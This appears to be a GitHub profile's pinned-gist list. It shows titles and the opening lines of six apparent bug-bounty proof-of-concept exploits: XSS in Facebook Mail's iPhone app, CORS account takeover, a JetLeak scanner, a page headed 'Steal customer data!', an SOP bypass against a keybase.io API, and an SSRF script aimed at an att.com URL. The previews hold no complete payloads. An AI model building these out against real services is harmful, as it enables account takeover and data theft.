PinnedLoading

1. iPhone app XSS in Facebook MailiPhone app XSS in Facebook Mail

   1

   <scripttype="text/javascript"src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>

   2

   <scripttype="text/javascript">

   3

   // http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9

   4

   $(function(){

   5

   parse_messages=function()

2. Full Account Takeover through CORS w...Full Account Takeover through CORS with connection Sockets

   1

   <!DOCTYPE html>

   2

   <html>

   3

   <head><title>Exploiting CORS</title></head>

   4

   <body>

   5

   <center>

3. Vulnerable to JetLeakVulnerable to JetLeak

   1

   importhttplib,urllib,ssl,string,sys,getopt

   2

   importdatetime

   3

   fromurlparseimporturlparse

   4

   5

   f=open('jetleak_'+datetime.datetime.now().strftime('%Y%m%d_%H_%M')+'.txt','w')

4. Cross Origin Resource Sharing Miscon...Cross Origin Resource Sharing Misconfiguration

   1

   <!DOCTYPE html>

   2

   <html>

   3

   <body>

   4

   <center>

   5

   <h3>Steal customer data!</h3>

5. SOP bypass using browser cache (http...SOP bypass using browser cache (https://hackerone.com/reports/761726)

   1

   <html>

   2

   <script>

   3

   varurl="https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";

   4

   fetch(url,{

   5

   method:'GET',

6. ssrf.pyssrf.py

   1

   importrequests

   2

   3

   url="https://onlinefaxtwo.att.com/loa.php"

   4

   5